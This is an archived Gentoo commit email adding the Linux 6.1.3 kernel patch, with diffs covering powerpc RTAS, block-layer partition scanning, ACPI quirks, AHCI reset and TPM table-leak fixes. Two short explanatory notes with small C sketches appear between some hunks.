+     my %configs = %min_configs;
+-    delete $configs{$config};
++    $configs{$config} = "# $config is not set";
+     make_new_config ((values %configs), (values %keep_configs));
+     make_oldconfig;
++    delete $configs{$config};
+     undef %configs;
+     assign_configs \%configs, $output_config;
+ 
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index a3ea3d4a206d0..291144c284fbc 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -123,6 +123,11 @@ endef
+ clean:
+ 	$(CLEAN)
+ 
++# Enables to extend CFLAGS and LDFLAGS from command line, e.g.
++# make USERCFLAGS=-Werror USERLDFLAGS=-static
++CFLAGS += $(USERCFLAGS)
++LDFLAGS += $(USERLDFLAGS)
++
+ # When make O= with kselftest target from main level
+ # the following aren't defined.
+ #


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-04 11:37 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-04 11:37 UTC (permalink / raw
  To: gentoo-commits

commit:     7c26232904d6e8afce4197aacf2e2fa2a2afdcf1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan  4 11:37:35 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan  4 11:37:35 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7c262329

Linux patch 6.1.3

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1002_linux-6.1.3.patch | 2606 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2610 insertions(+)

diff --git a/0000_README b/0000_README
index 7f1d2ce2..1fe5b8d9 100644
--- a/0000_README
+++ b/0000_README
@@ -51,6 +51,10 @@ Patch:  1001_linux-6.1.2.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.2
 
+Patch:  1002_linux-6.1.3.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.3
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1002_linux-6.1.3.patch b/1002_linux-6.1.3.patch
new file mode 100644
index 00000000..6909dce5
--- /dev/null
+++ b/1002_linux-6.1.3.patch
@@ -0,0 +1,2606 @@
+diff --git a/Documentation/trace/kprobes.rst b/Documentation/trace/kprobes.rst
+index 48cf778a24680..fc7ce76eab655 100644
+--- a/Documentation/trace/kprobes.rst
++++ b/Documentation/trace/kprobes.rst
+@@ -131,8 +131,7 @@ For example, if the function is non-recursive and is called with a
+ spinlock held, maxactive = 1 should be enough.  If the function is
+ non-recursive and can never relinquish the CPU (e.g., via a semaphore
+ or preemption), NR_CPUS should be enough.  If maxactive <= 0, it is
+-set to a default value.  If CONFIG_PREEMPT is enabled, the default
+-is max(10, 2*NR_CPUS).  Otherwise, the default is NR_CPUS.
++set to a default value: max(10, 2*NR_CPUS).
+ 
+ It's not a disaster if you set maxactive too low; you'll just miss
+ some probes.  In the kretprobe struct, the nmissed field is set to
+diff --git a/Makefile b/Makefile
+index 2ecc568c779fa..a69d14983a489 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 2
++SUBLEVEL = 3
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index e847f9b1c5b9f..767ab166933ba 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -889,6 +889,7 @@ void __noreturn rtas_halt(void)
+ 
+ /* Must be in the RMO region, so we place it here */
+ static char rtas_os_term_buf[2048];
++static s32 ibm_os_term_token = RTAS_UNKNOWN_SERVICE;
+ 
+ void rtas_os_term(char *str)
+ {
+@@ -900,16 +901,20 @@ void rtas_os_term(char *str)
+ 	 * this property may terminate the partition which we want to avoid
+ 	 * since it interferes with panic_timeout.
+ 	 */
+-	if (RTAS_UNKNOWN_SERVICE == rtas_token("ibm,os-term") ||
+-	    RTAS_UNKNOWN_SERVICE == rtas_token("ibm,extended-os-term"))
++	if (ibm_os_term_token == RTAS_UNKNOWN_SERVICE)
+ 		return;
+ 
+ 	snprintf(rtas_os_term_buf, 2048, "OS panic: %s", str);
+ 
++	/*
++	 * Keep calling as long as RTAS returns a "try again" status,
++	 * but don't use rtas_busy_delay(), which potentially
++	 * schedules.
++	 */
+ 	do {
+-		status = rtas_call(rtas_token("ibm,os-term"), 1, 1, NULL,
++		status = rtas_call(ibm_os_term_token, 1, 1, NULL,
+ 				   __pa(rtas_os_term_buf));
+-	} while (rtas_busy_delay(status));
++	} while (rtas_busy_delay_time(status));
+ 
+ 	if (status != 0)
+ 		printk(KERN_EMERG "ibm,os-term call failed %d\n", status);
+@@ -1277,6 +1282,13 @@ void __init rtas_initialize(void)
+ 	no_entry = of_property_read_u32(rtas.dev, "linux,rtas-entry", &entry);
+ 	rtas.entry = no_entry ? rtas.base : entry;
+ 
++	/*
++	 * Discover these now to avoid device tree lookups in the
++	 * panic path.
++	 */
++	if (of_property_read_bool(rtas.dev, "ibm,extended-os-term"))
++		ibm_os_term_token = rtas_token("ibm,os-term");
++
+ 	/* If RTAS was found, allocate the RMO buffer for it and look for
+ 	 * the stop-self token if any
+ 	 */
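
The rtas.c change above follows a general panic-path rule: anything a panic handler needs (here the ibm,os-term token) must be resolved at boot, because device-tree lookups and scheduling-prone helpers like rtas_busy_delay() are off-limits once the system is dying. A minimal sketch of the cache-at-init shape, with illustrative names only:

#include <stdio.h>

#define TOKEN_UNKNOWN (-1)

static int os_term_token = TOKEN_UNKNOWN;

static int expensive_lookup(const char *name)	/* boot-time only */
{
	(void)name;
	return 0x42;		/* pretend firmware token */
}

static void init_time(void)
{
	os_term_token = expensive_lookup("ibm,os-term");
}

static void panic_time(const char *msg)
{
	if (os_term_token == TOKEN_UNKNOWN)
		return;		/* nothing safe to call */
	printf("os-term(%#x): %s\n", os_term_token, msg);
}

int main(void)
{
	init_time();
	panic_time("example");
	return 0;
}
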
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 3e3bd1a466464..7b894df32e320 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -5383,8 +5383,8 @@ static void bfq_exit_icq_bfqq(struct bfq_io_cq *bic, bool is_sync)
+ 		unsigned long flags;
+ 
+ 		spin_lock_irqsave(&bfqd->lock, flags);
+-		bfq_exit_bfqq(bfqd, bfqq);
+ 		bic_set_bfqq(bic, NULL, is_sync);
++		bfq_exit_bfqq(bfqd, bfqq);
+ 		spin_unlock_irqrestore(&bfqd->lock, flags);
+ 	}
+ }
+diff --git a/block/blk.h b/block/blk.h
+index a186ea20f39d8..8b75a95b28d60 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -436,7 +436,7 @@ static inline struct kmem_cache *blk_get_queue_kmem_cache(bool srcu)
+ }
+ struct request_queue *blk_alloc_queue(int node_id, bool alloc_srcu);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index 647f7d8d88312..c4765681a8b4b 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,7 +356,7 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ {
+ 	struct block_device *bdev;
+ 
+@@ -366,6 +366,9 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
++	/* Someone else has bdev exclusively open? */
++	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
++		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
+@@ -500,7 +503,7 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ);
++			disk_scan_partitions(disk, FMODE_READ, NULL);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 60121e89052bc..96617512982e5 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,9 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
+-				unsigned cmd, unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
++			       unsigned long arg, void __user *argp)
+ {
++	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -527,7 +528,8 @@ static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL);
++		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
++					    file);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -605,7 +607,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -674,7 +676,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
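
The block-layer hunks above thread a new owner argument through disk_scan_partitions() so that BLKRRPART is refused while someone *else* holds the device exclusively, but the exclusive holder itself may still trigger a rescan. The check in isolation, as a compilable sketch (struct and names are stand-ins):

#include <errno.h>
#include <stdio.h>

struct disk { void *exclusive_holder; };

static int scan_partitions(struct disk *d, void *caller)
{
	if (d->exclusive_holder && d->exclusive_holder != caller)
		return -EBUSY;	/* someone else has it open O_EXCL */
	return 0;		/* proceed with the rescan */
}

int main(void)
{
	struct disk d = { .exclusive_holder = (void *)0x1 };

	printf("%d %d\n", scan_partitions(&d, (void *)0x1),	/* 0 */
			  scan_partitions(&d, (void *)0x2));	/* -16 */
	return 0;
}
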
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index f27914aedbd5a..16dcd31d124fe 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -432,10 +432,24 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B2502",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B2502CBA"),
++		},
++	},
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id lenovo_82ra[] = {
++static const struct dmi_system_id lenovo_laptop[] = {
++	{
++		.ident = "LENOVO IdeaPad Flex 5 14ALC7",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82R9"),
++		},
++	},
+ 	{
+ 		.ident = "LENOVO IdeaPad Flex 5 16ALC7",
+ 		.matches = {
+@@ -446,6 +460,17 @@ static const struct dmi_system_id lenovo_82ra[] = {
+ 	{ }
+ };
+ 
++static const struct dmi_system_id schenker_gm_rg[] = {
++	{
++		.ident = "XMG CORE 15 (M22)",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
++			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -458,8 +483,9 @@ struct irq_override_cmp {
+ static const struct irq_override_cmp override_table[] = {
+ 	{ medion_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+-	{ lenovo_82ra, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ lenovo_82ra, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
++	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index ffa19d418847f..13f10fbcd7f03 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -34,6 +34,7 @@
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ #include <linux/platform_data/x86/nvidia-wmi-ec-backlight.h>
++#include <linux/pnp.h>
+ #include <linux/types.h>
+ #include <linux/workqueue.h>
+ #include <acpi/video.h>
+@@ -105,6 +106,26 @@ static bool nvidia_wmi_ec_supported(void)
+ }
+ #endif
+ 
++static bool apple_gmux_backlight_present(void)
++{
++	struct acpi_device *adev;
++	struct device *dev;
++
++	adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
++	if (!adev)
++		return false;
++
++	dev = acpi_get_first_physical_node(adev);
++	if (!dev)
++		return false;
++
++	/*
++	 * drivers/platform/x86/apple-gmux.c only supports old style
++	 * Apple GMUX with an IO-resource.
++	 */
++	return pnp_get_resource(to_pnp_dev(dev), IORESOURCE_IO, 0) != NULL;
++}
++
+ /* Force to use vendor driver when the ACPI device is known to be
+  * buggy */
+ static int video_detect_force_vendor(const struct dmi_system_id *d)
+@@ -755,7 +776,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+ 
+-	if (apple_gmux_present())
++	if (apple_gmux_backlight_present())
+ 		return acpi_backlight_apple_gmux;
+ 
+ 	/* Chromebooks should always prefer native backlight control. */
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index 5350c73564b60..c7afce465a071 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -28,10 +28,6 @@ static bool sleep_no_lps0 __read_mostly;
+ module_param(sleep_no_lps0, bool, 0644);
+ MODULE_PARM_DESC(sleep_no_lps0, "Do not use the special LPS0 device interface");
+ 
+-static bool prefer_microsoft_dsm_guid __read_mostly;
+-module_param(prefer_microsoft_dsm_guid, bool, 0644);
+-MODULE_PARM_DESC(prefer_microsoft_dsm_guid, "Prefer using Microsoft GUID in LPS0 device _DSM evaluation");
+-
+ static const struct acpi_device_id lps0_device_ids[] = {
+ 	{"PNP0D80", },
+ 	{"", },
+@@ -369,27 +365,15 @@ out:
+ }
+ 
+ struct amd_lps0_hid_device_data {
+-	const unsigned int rev_id;
+ 	const bool check_off_by_one;
+-	const bool prefer_amd_guid;
+ };
+ 
+ static const struct amd_lps0_hid_device_data amd_picasso = {
+-	.rev_id = 0,
+ 	.check_off_by_one = true,
+-	.prefer_amd_guid = false,
+ };
+ 
+ static const struct amd_lps0_hid_device_data amd_cezanne = {
+-	.rev_id = 0,
+-	.check_off_by_one = false,
+-	.prefer_amd_guid = false,
+-};
+-
+-static const struct amd_lps0_hid_device_data amd_rembrandt = {
+-	.rev_id = 2,
+ 	.check_off_by_one = false,
+-	.prefer_amd_guid = true,
+ };
+ 
+ static const struct acpi_device_id amd_hid_ids[] = {
+@@ -397,69 +381,27 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{"AMD0005",	(kernel_ulong_t)&amd_picasso,	},
+ 	{"AMDI0005",	(kernel_ulong_t)&amd_picasso,	},
+ 	{"AMDI0006",	(kernel_ulong_t)&amd_cezanne,	},
+-	{"AMDI0007",	(kernel_ulong_t)&amd_rembrandt,	},
+ 	{}
+ };
+ 
+-static int lps0_prefer_microsoft(const struct dmi_system_id *id)
++static int lps0_prefer_amd(const struct dmi_system_id *id)
+ {
+-	pr_debug("Preferring Microsoft GUID.\n");
+-	prefer_microsoft_dsm_guid = true;
++	pr_debug("Using AMD GUID w/ _REV 2.\n");
++	rev_id = 2;
+ 	return 0;
+ }
+-
+ static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+ 	{
+ 		/*
+-		 * ASUS TUF Gaming A17 FA707RE
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216101
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ASUS TUF Gaming A17"),
+-		},
+-	},
+-	{
+-		/* ASUS ROG Zephyrus G14 (2022) */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Zephyrus G14 GA402"),
+-		},
+-	},
+-	{
+-		/*
+-		 * Lenovo Yoga Slim 7 Pro X 14ARH7
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216473 : 82V2
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216438 : 82TL
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "82"),
+-		},
+-	},
+-	{
+-		/*
+-		 * ASUSTeK COMPUTER INC. ROG Flow X13 GV301RE_GV301RE
+-		 * https://gitlab.freedesktop.org/drm/amd/-/issues/2148
++		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
++		 * Contains specialized AML in AMD/_REV 2 path to avoid
++		 * triggering a bug in Qualcomm WLAN firmware. This may be
++		 * removed in the future if that firmware is fixed.
+ 		 */
+-		.callback = lps0_prefer_microsoft,
++		.callback = lps0_prefer_amd,
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Flow X13 GV301"),
+-		},
+-	},
+-	{
+-		/*
+-		 * ASUSTeK COMPUTER INC. ROG Flow X16 GV601RW_GV601RW
+-		 * https://gitlab.freedesktop.org/drm/amd/-/issues/2148
+-		 */
+-		.callback = lps0_prefer_microsoft,
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ROG Flow X16 GV601"),
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+ 		},
+ 	},
+ 	{}
+@@ -484,16 +426,14 @@ static int lps0_device_attach(struct acpi_device *adev,
+ 		if (dev_id->id[0])
+ 			data = (const struct amd_lps0_hid_device_data *) dev_id->driver_data;
+ 		else
+-			data = &amd_rembrandt;
+-		rev_id = data->rev_id;
++			data = &amd_cezanne;
+ 		lps0_dsm_func_mask = validate_dsm(adev->handle,
+ 					ACPI_LPS0_DSM_UUID_AMD, rev_id, &lps0_dsm_guid);
+ 		if (lps0_dsm_func_mask > 0x3 && data->check_off_by_one) {
+ 			lps0_dsm_func_mask = (lps0_dsm_func_mask << 1) | 0x1;
+ 			acpi_handle_debug(adev->handle, "_DSM UUID %s: Adjusted function mask: 0x%x\n",
+ 					  ACPI_LPS0_DSM_UUID_AMD, lps0_dsm_func_mask);
+-		} else if (lps0_dsm_func_mask_microsoft > 0 && data->prefer_amd_guid &&
+-				!prefer_microsoft_dsm_guid) {
++		} else if (lps0_dsm_func_mask_microsoft > 0 && rev_id) {
+ 			lps0_dsm_func_mask_microsoft = -EINVAL;
+ 			acpi_handle_debug(adev->handle, "_DSM Using AMD method\n");
+ 		}
+@@ -501,8 +441,7 @@ static int lps0_device_attach(struct acpi_device *adev,
+ 		rev_id = 1;
+ 		lps0_dsm_func_mask = validate_dsm(adev->handle,
+ 					ACPI_LPS0_DSM_UUID, rev_id, &lps0_dsm_guid);
+-		if (!prefer_microsoft_dsm_guid)
+-			lps0_dsm_func_mask_microsoft = -EINVAL;
++		lps0_dsm_func_mask_microsoft = -EINVAL;
+ 	}
+ 
+ 	if (lps0_dsm_func_mask < 0 && lps0_dsm_func_mask_microsoft < 0)
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 639de2d75d636..53ab2306da009 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -84,6 +84,7 @@ enum board_ids {
+ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent);
+ static void ahci_remove_one(struct pci_dev *dev);
+ static void ahci_shutdown_one(struct pci_dev *dev);
++static void ahci_intel_pcs_quirk(struct pci_dev *pdev, struct ahci_host_priv *hpriv);
+ static int ahci_vt8251_hardreset(struct ata_link *link, unsigned int *class,
+ 				 unsigned long deadline);
+ static int ahci_avn_hardreset(struct ata_link *link, unsigned int *class,
+@@ -677,6 +678,25 @@ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 	ahci_save_initial_config(&pdev->dev, hpriv);
+ }
+ 
++static int ahci_pci_reset_controller(struct ata_host *host)
++{
++	struct pci_dev *pdev = to_pci_dev(host->dev);
++	struct ahci_host_priv *hpriv = host->private_data;
++	int rc;
++
++	rc = ahci_reset_controller(host);
++	if (rc)
++		return rc;
++
++	/*
++	 * If platform firmware failed to enable ports, try to enable
++	 * them here.
++	 */
++	ahci_intel_pcs_quirk(pdev, hpriv);
++
++	return 0;
++}
++
+ static void ahci_pci_init_controller(struct ata_host *host)
+ {
+ 	struct ahci_host_priv *hpriv = host->private_data;
+@@ -871,7 +891,7 @@ static int ahci_pci_device_runtime_resume(struct device *dev)
+ 	struct ata_host *host = pci_get_drvdata(pdev);
+ 	int rc;
+ 
+-	rc = ahci_reset_controller(host);
++	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+ 		return rc;
+ 	ahci_pci_init_controller(host);
+@@ -907,7 +927,7 @@ static int ahci_pci_device_resume(struct device *dev)
+ 		ahci_mcp89_apple_enable(pdev);
+ 
+ 	if (pdev->dev.power.power_state.event == PM_EVENT_SUSPEND) {
+-		rc = ahci_reset_controller(host);
++		rc = ahci_pci_reset_controller(host);
+ 		if (rc)
+ 			return rc;
+ 
+@@ -1785,12 +1805,6 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* save initial config */
+ 	ahci_pci_save_initial_config(pdev, hpriv);
+ 
+-	/*
+-	 * If platform firmware failed to enable ports, try to enable
+-	 * them here.
+-	 */
+-	ahci_intel_pcs_quirk(pdev, hpriv);
+-
+ 	/* prepare host */
+ 	if (hpriv->cap & HOST_CAP_NCQ) {
+ 		pi.flags |= ATA_FLAG_NCQ;
+@@ -1900,7 +1914,7 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	rc = ahci_reset_controller(host);
++	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 1b18ce5ebab1e..0913d3eb8d518 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -90,16 +90,21 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 			return -ENODEV;
+ 
+ 		if (tbl->header.length <
+-				sizeof(*tbl) + sizeof(struct acpi_tpm2_phy))
++				sizeof(*tbl) + sizeof(struct acpi_tpm2_phy)) {
++			acpi_put_table((struct acpi_table_header *)tbl);
+ 			return -ENODEV;
++		}
+ 
+ 		tpm2_phy = (void *)tbl + sizeof(*tbl);
+ 		len = tpm2_phy->log_area_minimum_length;
+ 
+ 		start = tpm2_phy->log_area_start_address;
+-		if (!start || !len)
++		if (!start || !len) {
++			acpi_put_table((struct acpi_table_header *)tbl);
+ 			return -ENODEV;
++		}
+ 
++		acpi_put_table((struct acpi_table_header *)tbl);
+ 		format = EFI_TCG2_EVENT_LOG_FORMAT_TCG_2;
+ 	} else {
+ 		/* Find TCPA entry in RSDT (ACPI_LOGICAL_ADDRESSING) */
+@@ -120,8 +125,10 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 			break;
+ 		}
+ 
++		acpi_put_table((struct acpi_table_header *)buff);
+ 		format = EFI_TCG2_EVENT_LOG_FORMAT_TCG_1_2;
+ 	}
++
+ 	if (!len) {
+ 		dev_warn(&chip->dev, "%s: TCPA log area empty\n", __func__);
+ 		return -EIO;
+@@ -156,5 +163,4 @@ err:
+ 	kfree(log->bios_event_log);
+ 	log->bios_event_log = NULL;
+ 	return ret;
+-
+ }
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 65f8f179a27f0..16fc481d60950 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -676,12 +676,16 @@ static int crb_acpi_add(struct acpi_device *device)
+ 
+ 	/* Should the FIFO driver handle this? */
+ 	sm = buf->start_method;
+-	if (sm == ACPI_TPM2_MEMORY_MAPPED)
+-		return -ENODEV;
++	if (sm == ACPI_TPM2_MEMORY_MAPPED) {
++		rc = -ENODEV;
++		goto out;
++	}
+ 
+ 	priv = devm_kzalloc(dev, sizeof(struct crb_priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		rc = -ENOMEM;
++		goto out;
++	}
+ 
+ 	if (sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC) {
+ 		if (buf->header.length < (sizeof(*buf) + sizeof(*crb_smc))) {
+@@ -689,7 +693,8 @@ static int crb_acpi_add(struct acpi_device *device)
+ 				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
+ 				buf->header.length,
+ 				ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC);
+-			return -EINVAL;
++			rc = -EINVAL;
++			goto out;
+ 		}
+ 		crb_smc = ACPI_ADD_PTR(struct tpm2_crb_smc, buf, sizeof(*buf));
+ 		priv->smc_func_id = crb_smc->smc_func_id;
+@@ -700,17 +705,23 @@ static int crb_acpi_add(struct acpi_device *device)
+ 
+ 	rc = crb_map_io(device, priv, buf);
+ 	if (rc)
+-		return rc;
++		goto out;
+ 
+ 	chip = tpmm_chip_alloc(dev, &tpm_crb);
+-	if (IS_ERR(chip))
+-		return PTR_ERR(chip);
++	if (IS_ERR(chip)) {
++		rc = PTR_ERR(chip);
++		goto out;
++	}
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 	chip->acpi_dev_handle = device->handle;
+ 	chip->flags = TPM_CHIP_FLAG_TPM2;
+ 
+-	return tpm_chip_register(chip);
++	rc = tpm_chip_register(chip);
++
++out:
++	acpi_put_table((struct acpi_table_header *)buf);
++	return rc;
+ }
+ 
+ static int crb_acpi_remove(struct acpi_device *device)
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index bcff6429e0b4f..ed5dabd3c72d6 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -125,6 +125,7 @@ static int check_acpi_tpm2(struct device *dev)
+ 	const struct acpi_device_id *aid = acpi_match_device(tpm_acpi_tbl, dev);
+ 	struct acpi_table_tpm2 *tbl;
+ 	acpi_status st;
++	int ret = 0;
+ 
+ 	if (!aid || aid->driver_data != DEVICE_IS_TPM2)
+ 		return 0;
+@@ -132,8 +133,7 @@ static int check_acpi_tpm2(struct device *dev)
+ 	/* If the ACPI TPM2 signature is matched then a global ACPI_SIG_TPM2
+ 	 * table is mandatory
+ 	 */
+-	st =
+-	    acpi_get_table(ACPI_SIG_TPM2, 1, (struct acpi_table_header **)&tbl);
++	st = acpi_get_table(ACPI_SIG_TPM2, 1, (struct acpi_table_header **)&tbl);
+ 	if (ACPI_FAILURE(st) || tbl->header.length < sizeof(*tbl)) {
+ 		dev_err(dev, FW_BUG "failed to get TPM2 ACPI table\n");
